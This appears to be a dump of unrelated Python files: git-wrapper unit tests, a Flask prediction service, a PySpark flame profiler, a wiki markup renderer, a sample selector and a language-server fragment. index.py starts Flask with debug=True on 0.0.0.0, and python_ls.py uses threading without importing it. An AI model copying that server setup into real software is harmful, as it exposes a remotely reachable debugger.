r2.submodule_init(submodule = 'mod')
self.assertEqual( [ 'foo.txt', 'mod/subfoo.txt' ], r2.find_all_files() )
self.assertEqual( ( 'mod', None, sub_repo.last_commit_hash(), sub_repo.last_commit_hash(short_hash = True), True, 'heads/master' ),
r2.submodule_status_one('mod') )
@git_temp_home_func()
def test_submodule_update_revision(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
rev1 = sub_repo.last_commit_hash(short_hash = True)
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r1.find_all_files() )
r1.submodule_add(sub_repo.address, 'mod')
r1.commit('add mod submodule', '.')
r1.push()
self.assertEqual( [ 'foo.txt', 'mod/subfoo.txt' ], r1.find_all_files() )
rev2 = sub_repo.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
r2 = git_repo(self.make_temp_dir(), address = r1.address)
r2.clone()
r2.submodule_init(submodule = 'mod')
self.assertEqual( rev1, r2.submodule_status_one('mod').revision )
# check that setting the same revision returns false
rv = r2.submodule_update_revision('mod', rev1)
self.assertFalse( rv )
rv = r2.submodule_update_revision('mod', rev2)
self.assertTrue( rv )
r2.commit('update mod', 'mod')
r2.push()
rv = r2.submodule_update_revision('mod', rev2)
self.assertFalse( rv )
r3 = git_repo(self.make_temp_dir(), address = r1.address)
r3.clone()
r3.submodule_init(submodule = 'mod')
self.assertEqual( rev2, r3.submodule_status_one('mod').revision )
rev3 = sub_repo.add_file('sub_orange.txt', 'this is sub_orange.txt', push = True)
r4 = git_repo(self.make_temp_dir(), address = r1.address)
r4.clone()
r4.submodule_init(submodule = 'mod')
self.assertEqual( rev2, r4.submodule_status_one('mod').revision )
rv = r4.submodule_update_revision('mod', rev3)
self.assertTrue( rv )
r4.commit('update mod', 'mod')
r4.push()
self.assertEqual( rev3, r4.submodule_status_one('mod').revision )
rev4 = sub_repo.add_file('sub_melon.txt', 'this is sub_melon.txt', push = True)
r3.pull()
r3.submodule_init(submodule = 'mod')
self.assertEqual( rev3, r3.submodule_status_one('mod').revision )
rv = r3.submodule_update_revision('mod', rev4)
self.assertTrue( rv )
r3.commit('update mod', 'mod')
r3.push()
self.assertEqual( rev4, r3.submodule_status_one('mod').revision )
@git_temp_home_func()
def test_is_long_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
self.assertTrue( r.is_long_hash(r.last_commit_hash(short_hash = False)) )
self.assertFalse( r.is_long_hash(r.last_commit_hash(short_hash = True)) )
@git_temp_home_func()
def test_is_short_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
self.assertFalse( r.is_short_hash(r.last_commit_hash(short_hash = False)) )
self.assertTrue( r.is_short_hash(r.last_commit_hash(short_hash = True)) )
@git_temp_home_func()
def test_short_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
long_hash = r.last_commit_hash(short_hash = False)
short_hash = r.last_commit_hash(short_hash = True)
self.assertEqual( short_hash, r.short_hash(long_hash) )
self.assertEqual( short_hash, r.short_hash(short_hash) )
@git_temp_home_func()
def test_long_hash(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
long_hash = r.last_commit_hash(short_hash = False)
short_hash = r.last_commit_hash(short_hash = True)
self.assertTrue( r.is_long_hash(long_hash) )
self.assertFalse( r.is_long_hash(short_hash) )
self.assertEqual( long_hash, r.long_hash(long_hash) )
self.assertEqual( long_hash, r.long_hash(short_hash) )
@git_temp_home_func()
def test_revision_equals(self):
content = [
'file subfoo.txt "this is subfoo" 644',
]
r = self._make_repo(remote = True, content = content, prefix = '-mod-')
rev1_short = r.last_commit_hash(short_hash = True)
rev1_long = r.last_commit_hash(short_hash = True)
r.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
rev2_short = r.last_commit_hash(short_hash = True)
rev2_long = r.last_commit_hash(short_hash = True)
self.assertTrue( r.revision_equals(rev1_short, rev1_short) )
self.assertTrue( r.revision_equals(rev1_long, rev1_short) )
self.assertTrue( r.revision_equals(rev1_short, rev1_long) )
self.assertTrue( r.revision_equals(rev1_long, rev1_long) )
@git_temp_home_func()
def test_operation_with_reset_basic(self):
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "this is foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
def _op(repo):
repo.write_temp_content([
'file bar.txt "this is bar" 644',
])
repo.add('.')
r2.operation_with_reset(_op, 'add bar.txt')
self.assertEqual( 'this is foo', r2.read_file('foo.txt', codec = 'utf8') )
self.assertEqual( 'this is bar', r2.read_file('bar.txt', codec = 'utf8') )
r3 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo', r3.read_file('foo.txt', codec = 'utf8') )
self.assertEqual( 'this is bar', r3.read_file('bar.txt', codec = 'utf8') )
@git_temp_home_func()
def test_operation_with_reset_with_conflict(self):
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "this is foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
r3 = r1.make_temp_cloned_repo()
def _op2(repo):
repo.write_temp_content([
'file foo.txt "this is foo 2" 644',
])
r2.operation_with_reset(_op2, 'hack foo.txt to 2')
def _op3(repo):
repo.write_temp_content([
'file foo.txt "this is foo 3" 644',
])
r3.operation_with_reset(_op3, 'hack foo.txt to 3')
self.assertEqual( 'this is foo 3', r3.read_file('foo.txt', codec = 'utf8') )
r4 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo 3', r4.read_file('foo.txt', codec = 'utf8') )
@git_temp_home_func()
def test_operation_with_reset_with_multiprocess_conflict(self):
'''
Create a bunch of processes trying to push to the same repo.
This sometimes creates a git locking issue and tests the operation push retry code.
'''
r1 = self._make_repo()
r1.write_temp_content([
'file foo.txt "_foo" 644',
])
r1.add([ 'foo.txt' ])
r1.commit('add foo.txt', [ 'foo.txt' ])
r1.push('origin', 'master')
def worker(n):
worker_tmp_root = self.make_temp_dir(suffix = 'worker-{}'.format(n))
worker_repo = git_repo(worker_tmp_root, address = r1.address)
worker_repo.clone_or_pull()
worker_repo.checkout('master')
def _op(repo):
old_content = repo.read_file('foo.txt', codec = 'utf8')
new_content = '{}\nworker {}'.format(old_content, n)
fp = repo.file_path('foo.txt')
file_util.save(fp, content = new_content, codec = 'utf8', mode = 0o644)
worker_repo.operation_with_reset(_op, 'from worker {}'.format(n))
num_jobs = 9
jobs = []
for i in range(num_jobs):
p = multiprocessing.Process(target = worker, args = (i, ))
jobs.append(p)
p.start()
for job in jobs:
job.join()
r2 = r1.make_temp_cloned_repo()
self.assertEqual( [
'_foo',
'worker 0',
'worker 1',
'worker 2',
'worker 3',
'worker 4',
'worker 5',
'worker 6',
'worker 7',
'worker 8',
], sorted(r2.read_file('foo.txt', codec = 'utf8').split('\n')) )
@git_temp_home_func()
def test_atexit_reset(self):
r = self._make_repo()
r.write_temp_content([
'file foo.txt "_foo" 644',
])
r.add([ 'foo.txt' ])
r.commit('add foo.txt', [ 'foo.txt' ])
r.push('origin', 'master')
tmp_script_content = '''\
from bes.git.git_repo import git_repo
r = git_repo("{}", address = "{}")
r.atexit_reset(revision = 'HEAD')
r.save_file('foo.txt', content = 'i hacked you', add = False, commit = False)
'''.format(r.root, r.address)
tmp_script = self.make_temp_file(content = tmp_script_content, perm = 0o0755)
cmd = [ sys.executable, tmp_script, r.root ]
execute.execute(cmd)
self.assertFalse( r.has_changes() )
@git_temp_home_func()
def test_has_local_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
self.assertFalse( r.has_local_branch('kiwi') )
r.branch_create('kiwi')
self.assertTrue( r.has_local_branch('kiwi') )
@git_temp_home_func()
def test_has_remote_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
self.assertFalse( r.has_remote_branch('kiwi') )
r.branch_create('kiwi', push = True)
self.assertTrue( r.has_local_branch('kiwi') )
self.assertTrue( r.has_remote_branch('kiwi') )
@git_temp_home_func()
def test_reset(self):
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content)
r1.push('origin', 'master')
r2 = r1.make_temp_cloned_repo()
self.assertEqual( 'this is foo', r2.read_file('foo.txt') )
r2.save_file('foo.txt', 'i hacked you', add = False, commit = False)
self.assertEqual( 'i hacked you', r2.read_file('foo.txt') )
r2.reset()
self.assertEqual( 'this is foo', r2.read_file('foo.txt') )
@git_temp_home_func()
def test_clean(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
self.assertEqual( [ 'foo.txt' ], r.find_all_files() )
r.save_file('garbage.txt', 'this is garbage', add = False, commit = False)
self.assertEqual( [ 'foo.txt', 'garbage.txt' ], r.find_all_files() )
r.clean()
self.assertEqual( [ 'foo.txt' ], r.find_all_files() )
@git_temp_home_func()
def test_submodule_reset(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
rev1 = sub_repo.last_commit_hash(short_hash = True)
rev2 = sub_repo.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r1.find_all_files() )
r1.submodule_add(sub_repo.address, 'mod')
r1.commit('add mod submodule', '.')
r1.push()
self.assertEqual( [ 'foo.txt', 'mod/sub_kiwi.txt', 'mod/subfoo.txt' ], r1.find_all_files() )
self.assertFalse( r1.has_changes(submodules = True) )
rv = r1.submodule_update_revision('mod', rev1)
self.assertTrue( rv )
self.assertTrue( r1.has_changes(submodules = True) )
r1.reset(submodules = True)
self.assertFalse( r1.has_changes(submodules = True) )
@git_temp_home_func()
def test_submodule_clean(self):
sub_content = [
'file subfoo.txt "this is subfoo" 644',
]
sub_repo = self._make_repo(remote = True, content = sub_content, prefix = '-mod-')
rev1 = sub_repo.last_commit_hash(short_hash = True)
rev2 = sub_repo.add_file('sub_kiwi.txt', 'this is sub_kiwi.txt', push = True)
content = [
'file foo.txt "this is foo" 644',
]
r1 = self._make_repo(remote = True, content = content, prefix = '-main-')
self.assertEqual( [ 'foo.txt' ], r1.find_all_files() )
r1.submodule_add(sub_repo.address, 'mod')
r1.commit('add mod submodule', '.')
r1.push()
self.assertEqual( [ 'foo.txt', 'mod/sub_kiwi.txt', 'mod/subfoo.txt' ], r1.find_all_files() )
self.assertFalse( r1.has_changes() )
r1.save_file('mod/untracked_junk.txt', content = 'this is untracked junk', add = False, commit = False)
self.assertTrue( r1.has_changes(untracked_files = True, submodules = True) )
r1.clean(submodules = True)
self.assertFalse( r1.has_changes(untracked_files = True, submodules = True) )
@git_temp_home_func()
def test_head_info_basic(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
self.assertEqual( ( 'branch', 'master', None, c1, 'message 1', None ), r.head_info() )
@git_temp_home_func()
def test_head_info_empty_repo(self):
'Test head_info() works on an empty just created repo.'
tmp_dir = self.make_temp_dir()
git.init(tmp_dir)
r = git_repo(tmp_dir)
self.assertEqual( ( 'nothing', None, None, None, None, None ), r.head_info() )
@git_temp_home_func()
def test_head_info_detached_head_at_commit(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
r.add_file('bar.txt', 'this is bar')
c2 = r.last_commit_hash(short_hash = True)
r.checkout(c1)
self.assertEqual( ( 'detached_commit', None, None, c1, 'message 1', [ 'master' ] ), r.head_info() )
self.assertEqual( True, r.head_info().is_detached )
self.assertEqual( False, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'detached_commit', r.head_info().state )
self.assertEqual( 'detached_commit::{}'.format(c1), str(r.head_info()) )
@git_temp_home_func()
def test_head_info_detached_head_at_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
r.tag('1.2.3')
r.add_file('bar.txt', 'this is bar')
c2 = r.last_commit_hash(short_hash = True)
r.checkout('1.2.3')
self.assertEqual( ( 'tag', None, '1.2.3', c1, 'message 1', [ 'master' ] ), r.head_info() )
self.assertEqual( True, r.head_info().is_tag )
self.assertEqual( True, r.head_info().is_detached )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'tag', r.head_info().state )
self.assertEqual( 'tag:{}:{}'.format('1.2.3', c1), str(r.head_info()) )
@git_temp_home_func()
def test_head_info_detached_head_at_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
c1 = r.last_commit_hash(short_hash = True)
r.branch_create('b1', checkout = True)
self.assertEqual( ( 'branch', 'b1', None, c1, 'message 1', None ), r.head_info() )
self.assertEqual( False, r.head_info().is_detached )
r.add_file('bar.txt', 'this is bar in b1', commit_message = 'message 2')
c2 = r.last_commit_hash(short_hash = True)
self.assertEqual( ( 'branch', 'b1', None, c2, 'message 2', None ), r.head_info() )
self.assertEqual( False, r.head_info().is_tag )
self.assertEqual( True, r.head_info().is_branch )
self.assertEqual( 'branch', r.head_info().state )
self.assertEqual( 'branch:{}:{}'.format('b1', c2), str(r.head_info()) )
@git_temp_home_func()
def test_head_info_detached_head_at_tag_in_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
r.branch_create('b1', checkout = True)
r.add_file('kiwi.txt', 'this is kiwi in b1', commit_message = 'message 2')
c1 = r.last_commit_hash(short_hash = True)
r.tag('1.2.3')
r.checkout('master')
r.branch_create('b2', checkout = True)
r.add_file('lemon.txt', 'this is lemon in b1', commit_message = 'message 3')
r.checkout('1.2.3')
self.assertEqual( True, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'tag', r.head_info().state )
self.assertEqual( 'tag:{}:{}'.format('1.2.3', c1), str(r.head_info()) )
self.assertEqual( None, r.head_info().branch )
self.assertEqual( [ 'b1' ], r.head_info().ref_branches )
@git_temp_home_func()
def test_head_info_detached_head_at_tag_in_branch_multiple_branches(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
r.branch_create('b1', checkout = True)
r.add_file('kiwi.txt', 'this is kiwi in b1', commit_message = 'message 2')
c1 = r.last_commit_hash(short_hash = True)
r.tag('1.2.3')
r.branch_create('b2', checkout = True)
r.add_file('lemon.txt', 'this is lemon in b1', commit_message = 'message 3')
r.checkout('1.2.3')
self.assertEqual( True, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( 'tag', r.head_info().state )
self.assertEqual( 'tag:{}:{}'.format('1.2.3', c1), str(r.head_info()) )
self.assertEqual( None, r.head_info().branch )
self.assertEqual( [ 'b1', 'b2' ], r.head_info().ref_branches )
@git_temp_home_func()
def test_head_info_detached_head_at_commit_in_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content, commit_message = 'message 1')
r.branch_create('b1', checkout = True)
r.add_file('kiwi.txt', 'this is kiwi in b1', commit_message = 'message 2')
c1 = r.last_commit_hash(short_hash = True)
r.checkout('master')
r.branch_create('b2', checkout = True)
r.add_file('lemon.txt', 'this is lemon in b1', commit_message = 'message 3')
r.checkout(c1)
self.assertEqual( False, r.head_info().is_tag )
self.assertEqual( False, r.head_info().is_branch )
self.assertEqual( True, r.head_info().is_detached_commit )
self.assertEqual( 'detached_commit', r.head_info().state )
self.assertEqual( 'detached_commit::{}'.format(c1), str(r.head_info()) )
self.assertEqual( None, r.head_info().branch )
self.assertEqual( [ 'b1' ], r.head_info().ref_branches )
@git_temp_home_func()
def test_is_tag(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
commit1 = r.add_file('bar.txt', 'this is bar.txt')
r.tag('foo-1.0.0', push = False)
commit2 = r.add_file('baz.txt', 'this is baz.txt')
r.tag('foo-1.0.1', push = False)
self.assertTrue( r.is_tag('foo-1.0.0') )
self.assertTrue( r.is_tag('foo-1.0.1') )
self.assertFalse( r.is_tag('foo-1.0.2') )
self.assertFalse( r.is_tag(commit1) )
self.assertFalse( r.is_tag(commit2) )
r.branch_create('b1', checkout = True)
self.assertFalse( r.is_tag('b1') )
@git_temp_home_func()
def test_is_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
c1 = r.add_file('bar.txt', 'this is bar.txt')
r.tag('t1')
r.branch_create('b1', checkout = True)
c2 = r.add_file('baz.txt', 'this is baz.txt')
r.tag('t2')
r.checkout('master')
r.branch_create('b2', checkout = True)
self.assertFalse( r.is_branch('t1') )
self.assertFalse( r.is_branch('t2') )
self.assertTrue( r.is_branch('b1') )
self.assertTrue( r.is_branch('b2') )
self.assertFalse( r.is_branch('notthere') )
@git_temp_home_func()
def test_branches_for_tag_single_branch(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.branch_create('b1', checkout = True)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
r.tag('t1')
r.checkout('master')
r.branch_create('b2')
c2 = r.add_file('apple.txt', 'this is apple.txt')
r.checkout('master')
r.branch_create('b3', checkout = True)
self.assertEqual( [ 'b1' ], r.branches_for_tag('t1') )
@git_temp_home_func()
def test_branches_for_tag_multiple_branches(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.branch_create('b1', checkout = True)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
r.tag('t1')
r.branch_create('b2')
c2 = r.add_file('apple.txt', 'this is apple.txt')
r.checkout('master')
r.branch_create('b3')
self.assertEqual( [ 'b1', 'b2' ] , r.branches_for_tag('t1') )
@git_temp_home_func()
def test_branches_for_tag_detached_head(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
r.branch_create('b1', checkout = True)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
r.tag('t1')
r.checkout('master')
r.branch_create('b2')
c2 = r.add_file('apple.txt', 'this is apple.txt')
r.checkout('master')
r.branch_create('b3', checkout = True)
r.checkout('t1')
self.assertEqual( [ 'b1' ], r.branches_for_tag('t1') )
@git_temp_home_func()
def test_rsync_dir(self):
src_content = [
'file foo/bar/kiwi.txt "this is kiwi" 644',
]
src_repo = self._make_repo(remote = True, content = src_content)
dst_content = [
'file apple.txt "this is apple" 644',
]
dst_repo = self._make_repo(remote = True, content = dst_content)
# r.branch_create('b1', checkout = True)
# c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
# r.tag('t1')
# r.checkout('master')
# r.branch_create('b2')
# c2 = r.add_file('apple.txt', 'this is apple.txt')
# r.checkout('master')
# r.branch_create('b3', checkout = True)
# r.checkout('t1')
# self.assertEqual( [ 'b1' ], r.branches_for_tag('t1') )
@git_temp_home_func()
def test_tag_with_commit(self):
content = [
'file foo.txt "this is foo" 644',
]
r = self._make_repo(remote = True, content = content)
c1 = r.add_file('kiwi.txt', 'this is kiwi.txt')
c2 = r.add_file('lemon.txt', 'this is lemon.txt')
r.tag('t1')
c3 = r.add_file('apple.txt', 'this is apple.txt')
r.tag('t2')
r.tag('t3', commit = c1)
self.assertEqual( c3, r.ref_info('t3').commit_short )
if __name__ == '__main__':
unit_test.main()
|
index.py
|
from flask import Flask, request, jsonify
from src.request_processing import PredictRequestProcessor, ModelRequestProcessor
from initialize import before_all
import logging
import threading
import asyncio
from src.model_manager import ModelManager
import asyncio
app = Flask(__name__)
PORT = 80
def initialize_all():
ModelManager.initialize()
@app.route('/predict', methods=['POST'])
def predict():
"""Registry Design Pattern"""
logging.info("POST /predict")
request_data = request.json
request_processor = PredictRequestProcessor(request_data)
output = request_processor.get_response()
logging.info(output)
return output
@app.route('/model', methods=['PUT'])
def model():
"""Model Manager"""
request_data = request.json
request_processor = ModelRequestProcessor(request_data)
return request_processor.get_response()
if __name__ == '__main__':
before_all(PORT)
init_thread = threading.Thread(target=initialize_all)
init_thread.start()
app.run(host="0.0.0.0", port=PORT, debug=True)
|
__init__.py
|
from collections import defaultdict
from pyspark import AccumulatorParam
from pyspark.profiler import Profiler
from os.path import join
from threading import Thread, Event
from sys import _current_frames
def extract_stack(frame):
result = []
while frame is not None:
result.append((
frame.f_code.co_filename,
frame.f_code.co_name,
frame.f_lineno
))
frame = frame.f_back
return tuple(reversed(result))
class Collector(object):
def __init__(self, interval=0.01):
self.interval = interval
self.finished = Event()
def start(self):
self.thread = Thread(target=self.run)
self.thread.start()
def stop(self):
self.finished.set()
self.thread.join()
def run(self):
results = defaultdict(int)
self.results = results
this_thread = self.thread.ident
while True:
self.finished.wait(self.interval)
if self.finished.is_set():
return
results = self.results
frames = _current_frames()
for frame_id, frame in frames.items():
if frame_id != this_thread:
stack = extract_stack(frame)
results[stack] += 1
class ResultsAccumulator(AccumulatorParam):
def zero(self, value):
return defaultdict(int)
def addInPlace(self, a, b):
for stack, count in b.items():
a[stack] += count
return a
class FlameProfiler(Profiler):
def __init__(self, ctx):
self.interval = float(ctx.environment.get('pyspark_flame.interval', 0.05))
self._accumulator = ctx.accumulator(defaultdict(int), ResultsAccumulator())
def profile(self, func):
collector = Collector(self.interval)
collector.start()
try:
func()
finally:
collector.stop()
self._accumulator.add(collector.results)
def stats(self):
return self._accumulator.value
def show(self, id):
print "Flame Data for RDD {}".format(id)
print self.format()
def dump(self, id, path):
with open(join(path, 'rdd-{}.flame'.format(id)), 'w') as f:
f.write(self.format())
def format(self):
return ''.join(
'{stack} {count}\n'.format(stack=';'.join(
'{file}:{method}:{line}'.format(file=file_, method=method, line=line)
for file_, method, line in stack
), count=count)
for stack, count in self.stats().items()
)
|
mark.py
|
from .set_mark.namumark import namumark
from .set_mark.markdown import markdown
from .set_mark.tool import *
import re
import html
import sqlite3
import urllib.parse
import threading
import multiprocessing
def load_conn2(data):
global conn
global curs
conn = data
curs = conn.cursor()
def send_parser(data):
if not re.search('^<br>$', data):
data = html.escape(data)
javascript = re.compile('javascript:', re.I)
data = javascript.sub('', data)
while 1:
re_data = re.search('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', data)
if re_data:
re_data = re_data.groups()[0]
data = re.sub('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', '<a href="/w/' + urllib.parse.quote(re_data).replace('/','%2F') + '">' + re_data + '</a>', data, 1)
else:
break
return data
def plusing(data):
for data_in in data:
curs.execute(db_change("select title from back where title = ? and link = ? and type = ?"), [data_in[1], data_in[0], data_in[2]])
if not curs.fetchall():
curs.execute(db_change("insert into back (title, link, type) values (?, ?, ?)"), [data_in[1], data_in[0], data_in[2]])
def render_do(title, data, num, include):
curs.execute(db_change('select data from other where name = "markup"'))
rep_data = curs.fetchall()
if rep_data[0][0] == 'namumark':
data = namumark(conn, data, title, num, include)
elif rep_data[0][0] == 'markdown':
data = markdown(conn, data, title, num)
elif rep_data[0][0] == 'raw':
data = [data, '', []]
else:
data = ['', '', []]
if num == 1:
data_num = len(data[2])
data_in_num = int(data_num / multiprocessing.cpu_count())
data_in = []
for i in range(multiprocessing.cpu_count()):
if i != multiprocessing.cpu_count() - 1:
data_in += [data[2][data_in_num * i:data_in_num * (i + 1)]]
else:
data_in += [data[2][data_in_num * i:]]
for data_in_for in data_in:
thread_start = threading.Thread(target = plusing, args = [data_in_for])
thread_start.start()
thread_start.join()
conn.commit()
if num == 2:
return [data[0], data[1]]
else:
return data[0] + data[1]
|
sample_selector.py
|
#!/usr/bin/env python
__author__ = 'Florian Hase'
#========================================================================
import numpy as np
from multiprocessing import Process, Queue
from Utils.utils import VarDictParser
#========================================================================
class SampleSelector(VarDictParser):
def __init__(self, var_dicts):
VarDictParser.__init__(self, var_dicts)
self.total_size = 0
self.var_sizes = []
self.var_names = []
for var_dict in self.var_dicts:
self.total_size += var_dict[list(var_dict)[0]]['size']
self.var_sizes.append(int(var_dict[list(var_dict)[0]]['size']))
self.var_names.append(list(var_dict)[0])
def _compute_rewards_per_batch(self, batch_index, queue):
proposals = self.proposals[batch_index]
rewards = np.empty(len(proposals))
for sample_index, sample in enumerate(proposals):
num, den = self.penalty_contribs(sample)
penalty = (num + self.lambda_values[batch_index]) / den
rewards[sample_index] = np.exp( - penalty)
rewards = np.array(rewards)
queue.put({batch_index: rewards})
def _compute_rewards(self):
q = Queue()
processes = []
for batch_index in range(self.batch_size):
process = Process(target = self._compute_rewards_per_batch, args = (batch_index, q))
processes.append(process)
process.start()
for process in processes:
process.join()
result_dict = {}
while not q.empty():
results = q.get()
for key, value in results.items():
result_dict[key] = value
rewards = [result_dict[batch_index] for batch_index in range(self.batch_size)]
for reward_index, reward in enumerate(rewards):
setattr(self, 'rewards_%d' % reward_index, np.array(reward))
def select(self, num_samples, proposals, penalty_contribs, lambda_values, characteristic_distances):
self.num_samples = num_samples
self.proposals = proposals
self.penalty_contribs = penalty_contribs
self.lambda_values = lambda_values
self.characteristic_distances = characteristic_distances
self.batch_size = len(self.lambda_values)
self._compute_rewards()
# now we collect the samples
all_samples = []
proposal_copy = np.copy(self.proposals)
for sample_index in range(num_samples):
new_samples = []
for batch_index in range(self.batch_size):
batch_proposals = proposal_copy[batch_index]
# compute diversity punishments
div_crits = np.ones(len(batch_proposals))
if len(new_samples) > 0:
for sample_index, sample in enumerate(batch_proposals):
# min_distance = np.amin([np.linalg.norm(sample - x) for x in new_samples])
# min_distance = np.amin([np.linalg.norm(sample - x) for x in new_samples], axis = 0)
min_distance = np.amin([np.abs(sample - x) for x in new_samples], axis = 0)
div_crits[sample_index] = np.amin([1., np.amin(np.exp( 2. * (min_distance - self.characteristic_distances) / self.var_p_ranges))])
# get reweighted rewards
rewards = getattr(self, 'rewards_%d' % batch_index)
reweighted_rewards = div_crits * rewards
# reweighted_rewards = rewards
largest_reward_index = np.argmax(reweighted_rewards)
new_sample = batch_proposals[largest_reward_index]
new_samples.append(new_sample)
# update reward of picked sample
rewards[largest_reward_index] = 0.
setattr(self, 'rewards_%d' % batch_index, rewards)
# quit()
all_samples.append(np.array(new_samples))
all_samples = np.array(all_samples)
return all_samples
|
python_ls.py
|
# Copyright 2017 Palantir Technologies, Inc.
from functools import partial
import logging
import os
import socketserver
from .plugins.jedi_completion import pyls_completions
import napkin
from pyls_jsonrpc.dispatchers import MethodDispatcher
from pyls_jsonrpc.endpoint import Endpoint
from pyls_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
MAX_WORKERS = 64
PYTHON_FILE_EXTENSIONS = ('.py', '.pyi')
CONFIG_FILEs = ('pycodestyle.cfg', 'setup.cfg', 'tox.ini', '.flake8')
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == 'nt':
# Catch and pass on ConnectionResetError when parent process
# dies
# pylint: disable=no-member, undefined-variable
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
# pylint: disable=no-member
self.SHUTDOWN_CALL()
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError(
'Handler class must be an instance of PythonLanguageServer')
def shutdown_server(check_parent_process, *args):
# pylint: disable=unused-argument
if check_parent_process:
log.debug('Shutting down server')
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': partial(handler_class,
check_parent_process=check_parent_process),
'SHUTDOWN_CALL': partial(shutdown_server, check_parent_process)}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class,
bind_and_activate=False)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr,
port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError(
'Handler class must be an instance of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile, check_parent_process)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx, check_parent_process=False):
self.workspace = None
self.config = None
self.root_uri = None
self.watching_thread = None
self.workspaces = {}
self.uri_workspace_mapper = {}
